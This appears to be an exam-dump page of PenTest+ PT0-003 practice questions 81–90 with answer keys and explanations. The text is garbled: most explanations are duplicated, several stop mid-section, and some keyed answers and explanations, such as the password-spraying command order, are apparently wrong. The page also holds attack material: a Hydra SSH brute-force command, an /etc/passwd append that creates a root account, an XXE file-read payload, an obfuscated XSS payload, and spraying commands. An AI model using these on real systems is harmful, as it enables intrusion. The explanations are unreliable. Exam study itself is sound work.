Practice Free PT0-003 Exam Online Questions
Question #81
A company’s incident response team determines that a breach occurred because a penetration tester left a web shell.
Which of the following should the penetration tester have done after the engagement?
- A . Enable a host-based firewall on the machine
- B . Remove utilized persistence mechanisms on client systems
- C . Revert configuration changes made during the engagement
- D . Turn off command-and-control infrastructure
Correct Answer: B
B
Explanation:
Comprehensive and Detailed
The immediate and mandatory post-engagement action after completing an authorized penetration test is to remove any accounts, implants, backdoors, web shells, scheduled tasks, or other persistence mechanisms that were created or used during the test. Leaving persistence (a web shell in this case) is exactly what caused the breach and is an unacceptable post-test lapse.
Why B is correct:
Persistence mechanisms provide continued unauthorized access and are a direct security risk if not removed. Removing them returns the environment to its pre-test security posture and prevents later compromise by third parties.
Removal of persistence is a standard requirement in rules of engagement and in post-test cleanup checklists.
Why the other answers are incomplete or secondary:
B
Explanation:
Comprehensive and Detailed
The immediate and mandatory post-engagement action after completing an authorized penetration test is to remove any accounts, implants, backdoors, web shells, scheduled tasks, or other persistence mechanisms that were created or used during the test. Leaving persistence (a web shell in this case) is exactly what caused the breach and is an unacceptable post-test lapse.
Why B is correct:
Persistence mechanisms provide continued unauthorized access and are a direct security risk if not removed. Removing them returns the environment to its pre-test security posture and prevents later compromise by third parties.
Removal of persistence is a standard requirement in rules of engagement and in post-test cleanup checklists.
Why the other answers are incomplete or secondary:
Question #82
A penetration tester gains access to a host but does not have access to any type of shell.
Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?
- A . ProxyChains
- B . Netcat
- C . PowerShell ISE
- D . Process IDs
Correct Answer: B
B
Explanation:
If a penetration tester gains access to a host but does not have a shell, the best tool for further enumeration is Netcat.
Here’s why:
Netcat:
Versatility: Netcat is known as the "Swiss Army knife" of networking tools. It can be used for port scanning, banner grabbing, and setting up reverse shells.
Enumeration: Without a shell, Netcat can help enumerate open ports and services running on the host, providing insight into the host’s environment.
Comparison with Other Tools:
ProxyChains: Used to chain proxies together, not directly useful for enumeration without an initial shell.
PowerShell ISE: Requires a shell to execute commands and scripts.
Process IDs: Without a shell, enumerating process IDs directly isn’t possible.
Netcat’s ability to perform multiple network-related tasks without needing a shell makes it the best choice for further enumeration.
B
Explanation:
If a penetration tester gains access to a host but does not have a shell, the best tool for further enumeration is Netcat.
Here’s why:
Netcat:
Versatility: Netcat is known as the "Swiss Army knife" of networking tools. It can be used for port scanning, banner grabbing, and setting up reverse shells.
Enumeration: Without a shell, Netcat can help enumerate open ports and services running on the host, providing insight into the host’s environment.
Comparison with Other Tools:
ProxyChains: Used to chain proxies together, not directly useful for enumeration without an initial shell.
PowerShell ISE: Requires a shell to execute commands and scripts.
Process IDs: Without a shell, enumerating process IDs directly isn’t possible.
Netcat’s ability to perform multiple network-related tasks without needing a shell makes it the best choice for further enumeration.
Question #83
A previous penetration test report identified a host with vulnerabilities that was successfully exploited. Management has requested that an internal member of the security team reassess the host to determine if the vulnerability still exists.
Part 1:
. Analyze the output and select the command to exploit the vulnerable service.
Part 2:
. Analyze the output from each command.
・ Select the appropriate set of commands to escalate privileges.
・ Identify which remediation steps should be taken.
Correct Answer: The command that would most likely exploit the services is:
hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22
The appropriate set of commands to escalate privileges is:
echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd
The remediations that should be taken after the successful privilege escalation are:
Remove the SUID bit from cp.
Make backup script not world-writable.
Comprehensive Step-by-Step Explanation of the Simulation Part 1: Exploiting Vulnerable Service Nmap Scan Analysis
Command: nmap -sC -T4 192.168.10.2
Purpose: This command runs a default script scan with timing template 4 (aggressive).
Output:
bash
Copy code
Port State Service
22/tcp open ssh
23/tcp closed telnet
80/tcp open http
111/tcp closed rpcbind
445/tcp open samba
3389/tcp closed rdp
Ports open are SSH (22), HTTP (80), and Samba (445).
Enumerating Samba Shares
Command: enum4linux -S 192.168.10.2
Purpose: To enumerate Samba shares and users.
Output:
makefile
Copy code
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x42]
user:[syslog] rid:[0x4ba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[lowpriv] rid:[0x3fa]
We identify a user lowpriv.
Selecting Exploit Command
Hydra Command: hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22
Purpose: To perform a brute force attack on SSH using the lowpriv user and a list of the 500 worst passwords.
-l lowpriv: Specifies the username.
-P 500-worst-passwords.txt: Specifies the password list.
-t 4: Uses 4 tasks/threads for the attack.
ssh://192.168.10.2:22: Specifies the SSH service and port.
Executing the Hydra Command
Result: Successful login as lowpriv user if a match is found.
Part 2: Privilege Escalation and Remediation Finding SUID Binaries and Configuration Files Command: find / -perm -2 -type f 2>/dev/null | xargs ls -l Purpose: To find world-writable files.
Command: find / -perm -u=s -type f 2>/dev/null | xargs ls -l
Purpose: To find files with SUID permission.
Command: grep "/bin/bash" /etc/passwd | cut -d’:’ -f1-4,6,7
Purpose: To identify users with bash shell access.
Selecting Privilege Escalation Command
Command: echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd
Purpose: To create a new root user entry in the passwd file.
root2: Username.
5ZOYXRFHVZ7OY: Password hash.
::0:0: User and group ID (root).
/root: Home directory.
/bin/bash: Default shell.
Executing the Privilege Escalation Command
Result: Creation of a new root user root2 with a specified password.
Remediation Steps Post-Exploitation
Remove SUID Bit from cp:
Command: chmod u-s /bin/cp
Purpose: Removing the SUID bit from cp to prevent misuse.
Make Backup Script Not World-Writable:
Command: chmod o-w /path/to/backup/script
Purpose: Ensuring backup script is not writable by all users to prevent unauthorized modifications.
Execution and Verification
Verifying Hydra Attack:
Run the Hydra command and monitor for successful login attempts.
Verifying Privilege Escalation:
After appending the new root user to the passwd file, attempt to switch user to root2 and check root privileges.
Implementing Remediation:
Apply the remediation commands to secure the system and verify the changes have been implemented.
By following these detailed steps, one can replicate the simulation and ensure a thorough understanding of both the exploitation and the necessary remediations.
hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22
The appropriate set of commands to escalate privileges is:
echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd
The remediations that should be taken after the successful privilege escalation are:
Remove the SUID bit from cp.
Make backup script not world-writable.
Comprehensive Step-by-Step Explanation of the Simulation Part 1: Exploiting Vulnerable Service Nmap Scan Analysis
Command: nmap -sC -T4 192.168.10.2
Purpose: This command runs a default script scan with timing template 4 (aggressive).
Output:
bash
Copy code
Port State Service
22/tcp open ssh
23/tcp closed telnet
80/tcp open http
111/tcp closed rpcbind
445/tcp open samba
3389/tcp closed rdp
Ports open are SSH (22), HTTP (80), and Samba (445).
Enumerating Samba Shares
Command: enum4linux -S 192.168.10.2
Purpose: To enumerate Samba shares and users.
Output:
makefile
Copy code
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x42]
user:[syslog] rid:[0x4ba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[lowpriv] rid:[0x3fa]
We identify a user lowpriv.
Selecting Exploit Command
Hydra Command: hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22
Purpose: To perform a brute force attack on SSH using the lowpriv user and a list of the 500 worst passwords.
-l lowpriv: Specifies the username.
-P 500-worst-passwords.txt: Specifies the password list.
-t 4: Uses 4 tasks/threads for the attack.
ssh://192.168.10.2:22: Specifies the SSH service and port.
Executing the Hydra Command
Result: Successful login as lowpriv user if a match is found.
Part 2: Privilege Escalation and Remediation Finding SUID Binaries and Configuration Files Command: find / -perm -2 -type f 2>/dev/null | xargs ls -l Purpose: To find world-writable files.
Command: find / -perm -u=s -type f 2>/dev/null | xargs ls -l
Purpose: To find files with SUID permission.
Command: grep "/bin/bash" /etc/passwd | cut -d’:’ -f1-4,6,7
Purpose: To identify users with bash shell access.
Selecting Privilege Escalation Command
Command: echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd
Purpose: To create a new root user entry in the passwd file.
root2: Username.
5ZOYXRFHVZ7OY: Password hash.
::0:0: User and group ID (root).
/root: Home directory.
/bin/bash: Default shell.
Executing the Privilege Escalation Command
Result: Creation of a new root user root2 with a specified password.
Remediation Steps Post-Exploitation
Remove SUID Bit from cp:
Command: chmod u-s /bin/cp
Purpose: Removing the SUID bit from cp to prevent misuse.
Make Backup Script Not World-Writable:
Command: chmod o-w /path/to/backup/script
Purpose: Ensuring backup script is not writable by all users to prevent unauthorized modifications.
Execution and Verification
Verifying Hydra Attack:
Run the Hydra command and monitor for successful login attempts.
Verifying Privilege Escalation:
After appending the new root user to the passwd file, attempt to switch user to root2 and check root privileges.
Implementing Remediation:
Apply the remediation commands to secure the system and verify the changes have been implemented.
By following these detailed steps, one can replicate the simulation and ensure a thorough understanding of both the exploitation and the necessary remediations.
Question #84
A penetration tester gained a foothold within a network. The penetration tester needs to enumerate all users within the domain.
Which of the following is the best way to accomplish this task?
- A . pwd.exe
- B . net.exe
- C . sc.exe
- D . msconfig.exe
Correct Answer: B
B
Explanation:
Comprehensive and Detailed Explanation From Exact Extract:
net.exe is the classic Windows networking utility that includes commands for enumerating domain resources and accounts from a compromised host where the tester has any authenticated domain context. Typical commands used by penetration testers to enumerate domain users with net.exe include:
net user /domain ― lists domain user accounts (name and some properties).
net group "Domain Users" /domain ― lists members of the Domain Users group.
net view /domain ― lists computers in the domain (useful to find targets for further enumeration).
Why net.exe is the best option here:
It is installed by default on Windows systems and works with the current authenticated domain credentials (common after gaining a foothold).
It provides a quick, low-noise way to enumerate user accounts and groups without requiring additional tooling or elevated privileges beyond an authenticated domain user.
Results can be scripted and parsed for further enumeration and pivoting.
Why the other options are not appropriate:
B
Explanation:
Comprehensive and Detailed Explanation From Exact Extract:
net.exe is the classic Windows networking utility that includes commands for enumerating domain resources and accounts from a compromised host where the tester has any authenticated domain context. Typical commands used by penetration testers to enumerate domain users with net.exe include:
net user /domain ― lists domain user accounts (name and some properties).
net group "Domain Users" /domain ― lists members of the Domain Users group.
net view /domain ― lists computers in the domain (useful to find targets for further enumeration).
Why net.exe is the best option here:
It is installed by default on Windows systems and works with the current authenticated domain credentials (common after gaining a foothold).
It provides a quick, low-noise way to enumerate user accounts and groups without requiring additional tooling or elevated privileges beyond an authenticated domain user.
Results can be scripted and parsed for further enumeration and pivoting.
Why the other options are not appropriate:
Question #85
During a red-team exercise, a penetration tester obtains an employee’s access badge. The tester uses the badge’s information to create a duplicate for unauthorized entry.
Which of the following best describes this action?
- A . Smurfing
- B . Credential stuffing
- C . RFID cloning
- D . Card skimming
Correct Answer: C
C
Explanation:
RFID Cloning:
RFID (Radio-Frequency Identification) cloning involves copying the data from an access badge and creating a duplicate that can be used for unauthorized entry.
Tools like Proxmark or RFID duplicators are commonly used for this purpose.
Why Not Other Options?
A (Smurfing): A network-based denial-of-service attack, unrelated to physical access.
B (Credential stuffing): Involves using stolen credentials in bulk for authentication attempts, unrelated to badge cloning.
D (Card skimming): Relates to stealing credit card information, not access badges. CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
C
Explanation:
RFID Cloning:
RFID (Radio-Frequency Identification) cloning involves copying the data from an access badge and creating a duplicate that can be used for unauthorized entry.
Tools like Proxmark or RFID duplicators are commonly used for this purpose.
Why Not Other Options?
A (Smurfing): A network-based denial-of-service attack, unrelated to physical access.
B (Credential stuffing): Involves using stolen credentials in bulk for authentication attempts, unrelated to badge cloning.
D (Card skimming): Relates to stealing credit card information, not access badges. CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
Question #86
During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user.
Which of the following techniques would most likely be used for that purpose?
- A . Privilege escalation
- B . DOM injection
- C . Session hijacking
- D . Cross-site scripting
Correct Answer: D
D
Explanation:
Comprehensive and Detailed
Cross-site scripting (XSS) is a client-side attack where an attacker injects malicious scripts into a web page viewed by other users. When executed in a browser, it can steal session cookies, perform unauthorized transactions, or execute malicious actions on behalf of the victim.
Option D (Cross-site scripting) is correct because XSS can manipulate client-side input validation to execute unauthorized transactions.
Option A (Privilege escalation) is incorrect because it involves gaining higher privileges on a system, not attacking input validation in a web application.
Option B (DOM injection) is incorrect because DOM-based attacks manipulate browser-side JavaScript but are not necessarily used for unauthorized transactions.
Option C (Session hijacking) is incorrect because session hijacking requires capturing a valid user session, whereas XSS can steal session tokens for this purpose.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Chapter 6 (Web Application Attacks).
D
Explanation:
Comprehensive and Detailed
Cross-site scripting (XSS) is a client-side attack where an attacker injects malicious scripts into a web page viewed by other users. When executed in a browser, it can steal session cookies, perform unauthorized transactions, or execute malicious actions on behalf of the victim.
Option D (Cross-site scripting) is correct because XSS can manipulate client-side input validation to execute unauthorized transactions.
Option A (Privilege escalation) is incorrect because it involves gaining higher privileges on a system, not attacking input validation in a web application.
Option B (DOM injection) is incorrect because DOM-based attacks manipulate browser-side JavaScript but are not necessarily used for unauthorized transactions.
Option C (Session hijacking) is incorrect because session hijacking requires capturing a valid user session, whereas XSS can steal session tokens for this purpose.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Chapter 6 (Web Application Attacks).
Question #87
A penetration tester is preparing a password-spraying attack against a known list of users for the company "example".
The tester is using the following list of commands:
pw-inspector -i sailwords -t 8 -S pass
spray365.py spray -ep plan
users="~/user.txt"; allwords="~/words.txt"; pass="~/passwords.txt"; plan="~/spray.plan"
spray365.py generate –password-file $pass –userfile $user –domain "example.com" –execution- plan $plan
cew -m 5 "http://www.example.com" -w sailwords
Which of the following is the correct order for the list of the commands?
- A . 3,4,1,2,5
- B . 3,1,2,5,4
- C . 2,3,1,4,5
- D . 3,5,1,4,2
Correct Answer: A
A
Explanation:
Let’s break it down in order:
Step 3: Sets environment variables (paths to user list, password list, etc.).
Step 4: Generates the execution plan using spray365.py generate with the variables set in step 3.
Step 1: Filters the password list using pw-inspector to enforce a minimum password policy.
Step 2: Executes the password spraying using the generated plan.
Step 5: Optionally verifies availability or reachability using cew (custom enumeration wrapper).
The correct logical order of operations matches option A.
CompTIA PenTest+
Reference: PT0-003 Objective 2.3: Perform password attacks.
Kali tools & scripts usage and scripting logic are core elements in PenTest+ methodology.
A
Explanation:
Let’s break it down in order:
Step 3: Sets environment variables (paths to user list, password list, etc.).
Step 4: Generates the execution plan using spray365.py generate with the variables set in step 3.
Step 1: Filters the password list using pw-inspector to enforce a minimum password policy.
Step 2: Executes the password spraying using the generated plan.
Step 5: Optionally verifies availability or reachability using cew (custom enumeration wrapper).
The correct logical order of operations matches option A.
CompTIA PenTest+
Reference: PT0-003 Objective 2.3: Perform password attacks.
Kali tools & scripts usage and scripting logic are core elements in PenTest+ methodology.
Question #88
Which of the following is a reason to use a template when creating a penetration testing report?
- A . To articulate risks accurately
- B . To enhance the testing approach
- C . To contextualize collected data
- D . To standardize needed information
- E . To improve testing time
Correct Answer: D
D
Explanation:
Comprehensive and Detailed
A template ensures consistency across reports by defining the required sections (scope, methodology, findings, risk ratings, remediation, evidence, executive summary, and appendices). Standardization helps reviewers and clients quickly find required information, supports quality assurance, and ensures compliance with contractual/reporting requirements. While templates also help articulate risks and contextualize data (A and C) and may indirectly save time (E), their primary purpose is to standardize needed information so every engagement includes the same baseline content and structure.
CompTIA PT0-003 Mapping:
Domain 5.0 Reporting and Communication ― produce consistent, repeatable reports and use templates to ensure completeness and QA.
D
Explanation:
Comprehensive and Detailed
A template ensures consistency across reports by defining the required sections (scope, methodology, findings, risk ratings, remediation, evidence, executive summary, and appendices). Standardization helps reviewers and clients quickly find required information, supports quality assurance, and ensures compliance with contractual/reporting requirements. While templates also help articulate risks and contextualize data (A and C) and may indirectly save time (E), their primary purpose is to standardize needed information so every engagement includes the same baseline content and structure.
CompTIA PT0-003 Mapping:
Domain 5.0 Reporting and Communication ― produce consistent, repeatable reports and use templates to ensure completeness and QA.
Question #89
A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:
xml
Copy code
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY foo SYSTEM "file:///etc/passwd" >
]>
<test>&foo;</test>
Which of the following should the tester recommend in the report to best prevent this type of vulnerability?
- A . Drop all excessive file permissions with chmod o-rwx.
- B . Ensure the requests application access logs are reviewed frequently.
- C . Disable the use of external entities.
- D . Implement a WAF to filter all incoming requests.
Correct Answer: C
C
Explanation:
The vulnerability in question is XML External Entity (XXE) injection, which occurs when an application processes XML input containing external entities that access files on the server or external resources. Disabling External Entities:
The root cause of the issue is the application’s ability to process external entities (<!ENTITY foo SYSTEM …>). Disabling external entities entirely prevents XXE attacks.
This can be achieved by properly configuring the XML parser (e.g., in Java, disable DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)).
Why Not Other Options?
A (chmod o-rwx): File permission hardening may reduce the impact of a successful attack but does not mitigate XXE at the parser level.
B (Review logs): Reviewing logs is a reactive measure, not a prevention mechanism.
D (WAF): A WAF may block some malicious requests but is not a reliable mitigation for XXE
vulnerabilities embedded in legitimate XML input.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
OWASP XXE Prevention Cheat Sheet
C
Explanation:
The vulnerability in question is XML External Entity (XXE) injection, which occurs when an application processes XML input containing external entities that access files on the server or external resources. Disabling External Entities:
The root cause of the issue is the application’s ability to process external entities (<!ENTITY foo SYSTEM …>). Disabling external entities entirely prevents XXE attacks.
This can be achieved by properly configuring the XML parser (e.g., in Java, disable DocumentBuilderFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)).
Why Not Other Options?
A (chmod o-rwx): File permission hardening may reduce the impact of a successful attack but does not mitigate XXE at the parser level.
B (Review logs): Reviewing logs is a reactive measure, not a prevention mechanism.
D (WAF): A WAF may block some malicious requests but is not a reliable mitigation for XXE
vulnerabilities embedded in legitimate XML input.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
OWASP XXE Prevention Cheat Sheet
Question #90
During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:
html
Copy code
7/<sCRitP>aLeRt(‘pwned’)</ScriPt>
Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?
- A . Arbitrary code execution: the affected computer should be placed on a perimeter network
- B . SQL injection attack: should be detected and prevented by a web application firewall
- C . Cross-site request forgery: should be detected and prevented by a firewall
- D . XSS obfuscated: should be prevented by input sanitization
Correct Answer: D
D
Explanation:
XSS Attack
The payload exploits Cross-Site Scripting (XSS) by injecting obfuscated JavaScript into the application.
When rendered, the browser executes the malicious code (e.g., alert(‘pwned’)).
Obfuscation (<sCRitP> instead of <script>) attempts to bypass naive input filters.
Countermeasure:
Implement input sanitization to ensure all user inputs are properly validated and escaped before being processed or rendered.
Other measures include using Content Security Policies (CSP) and output encoding.
Why Not Other Options?
A: This is not arbitrary code execution; it is a browser-based attack.
B: XSS is unrelated to SQL injection.
C: Cross-Site Request Forgery (CSRF) is a different vulnerability targeting session handling, not script injection.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits) OWASP XSS Prevention Cheat Sheet
D
Explanation:
XSS Attack
The payload exploits Cross-Site Scripting (XSS) by injecting obfuscated JavaScript into the application.
When rendered, the browser executes the malicious code (e.g., alert(‘pwned’)).
Obfuscation (<sCRitP> instead of <script>) attempts to bypass naive input filters.
Countermeasure:
Implement input sanitization to ensure all user inputs are properly validated and escaped before being processed or rendered.
Other measures include using Content Security Policies (CSP) and output encoding.
Why Not Other Options?
A: This is not arbitrary code execution; it is a browser-based attack.
B: XSS is unrelated to SQL injection.
C: Cross-Site Request Forgery (CSRF) is a different vulnerability targeting session handling, not script injection.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits) OWASP XSS Prevention Cheat Sheet